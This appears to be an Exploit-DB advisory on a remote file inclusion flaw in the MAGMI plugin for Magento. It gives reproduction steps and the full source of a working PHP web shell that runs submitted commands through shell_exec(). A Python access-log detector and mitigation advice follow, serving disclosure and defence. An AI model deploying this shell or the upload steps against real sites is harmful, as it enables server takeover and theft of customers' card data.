Magento Server MAGMI Plugin 0.7.17a - Remote File Inclusion

Published: 25 Oct 2014. Reported by Parvinder Bhasin. Type: exploitdb. Source: www.exploit-db.com

Magento Server MAGMI Plugin 0.7.17a Remote File Inclusion exploit allows remote command execution.

Code
Exploit found date:  10/24/2014
Security Researcher name:  Parvinder Bhasin
Contact info:  [email protected]
twitter:  @parvinderb - scorpio

Currently tested versions:
Magento version:  Magento CE 1.8 and older
MAGMI version: v0.7.17a and older

Download software link:
Magento server:  http://www.magentocommerce.com/download
MAGMI Plugin:
https://sourceforge.net/projects/magmi/files/magmi-0.7/plugins/packages/

MAGMI (MAGento Mass Importer) suffers from a file inclusion vulnerability
(RFI) which allows an attacker to upload essentially any PHP file (without
any sanity checks).  This PHP file could then be used to skim credit card
data, rewrite files, run remote commands, delete files, etc.  Essentially,
this gives an attacker the ability to execute remote commands on the vulnerable
server.


Steps to reproduce:

1.  Browse to http://<a magentosite.com>/magmi/web/magmi.php
2.  Under "upload new plugins", click on "choose file".
MAGento plugins are basically PHP files zipped, so create a PHP shell and
zip the file (e.g. evil.php, zipped as evil_plugin.zip).  After the file
has been uploaded, it will say:  Plugin packaged installed.
evil.php:

<?php
// Form for entering a command; the entered value is passed to shell_exec().
if (isset($_POST['command'])) {
    echo "<form action='evil.php' method='post'>
          <input type='text' name='command' value=''/>
          <input type='submit' value='execute'/>
          </form>";

    if (function_exists('shell_exec')) {
        $command = $_POST['command'];
        $output  = shell_exec("$command");
        echo "<pre>$output</pre>";
    }
} else {
    echo "<form action='evil.php' method='post'>
          <input type='text' name='command' value=''/>
          <input type='submit' value='execute'/>
          </form>";
}
?>

3.  Your malicious evil.php file is now extracted.  All you then need to do
is access the evil.php page at:
http://<amagentosite.com>/magmi/plugins/evil.php
At this point you could really have access to the entire system: download
any malware, install rootkits, skim credit card data, etc.
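As an added defender-side example (not part of the original advisory or of MAGMI itself), the following Python script scans Apache combined-format access logs for the sequence described above: the plugin-upload page /magmi/web/magmi.php answering 200 to an unauthenticated client, a successful POST to it, and subsequent direct requests to a PHP file under /magmi/plugins/. The log lines are constructed sample data; the finding names are this example's own.

```python
import re

# Constructed sample Apache access-log lines (not from the original advisory).
SAMPLE_LOG = """\
203.0.113.5 - - [24/Oct/2014:10:01:02 +0000] "GET /magmi/web/magmi.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Oct/2014:10:01:20 +0000] "POST /magmi/web/magmi.php HTTP/1.1" 200 412 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Oct/2014:10:01:35 +0000] "GET /magmi/plugins/evil.php HTTP/1.1" 200 300 "-" "Mozilla/5.0"
203.0.113.5 - - [24/Oct/2014:10:01:41 +0000] "POST /magmi/plugins/evil.php HTTP/1.1" 200 1800 "-" "Mozilla/5.0"
198.51.100.7 - - [24/Oct/2014:11:15:00 +0000] "GET /magmi/web/magmi.php HTTP/1.1" 401 0 "-" "Mozilla/5.0"
"""

# Apache "combined" format: client IP, timestamp, request line, status code.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)
UPLOADER = "/magmi/web/magmi.php"                        # plugin-upload page from the advisory
PLUGIN_PHP_RE = re.compile(r'^/magmi/plugins/.+\.php$')  # where uploaded plugin files land


def find_magmi_abuse(log_text):
    """Return (ip, finding, path) tuples for MAGMI-related events in the log.

    uploader-reachable              magmi.php answered 200 (no auth in front of it)
    plugin-upload-post              a POST to magmi.php succeeded (possible plugin upload)
    plugin-script-hit               a PHP file under /magmi/plugins/ was requested directly
    plugin-script-hit-after-upload  same, from an IP that POSTed to magmi.php earlier
    """
    findings = []
    uploaders = set()
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, method, status = m["ip"], m["method"], m["status"]
        path = m["path"].split("?", 1)[0]
        if status != "200":
            continue  # 401/403 means the request was blocked; nothing to flag
        if path == UPLOADER:
            if method == "POST":
                uploaders.add(ip)
                findings.append((ip, "plugin-upload-post", path))
            else:
                findings.append((ip, "uploader-reachable", path))
        elif PLUGIN_PHP_RE.match(path):
            kind = "plugin-script-hit-after-upload" if ip in uploaders else "plugin-script-hit"
            findings.append((ip, kind, path))
    return findings


if __name__ == "__main__":
    for ip, kind, path in find_magmi_abuse(SAMPLE_LOG):
        print(f"{ip:15} {kind:32} {path}")
```

A 401 on magmi.php (last sample line) is what you want to see: the mitigation for this issue is to put authentication or an IP allow-list in front of the MAGMI directory, since the uploader performs no checks of its own.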
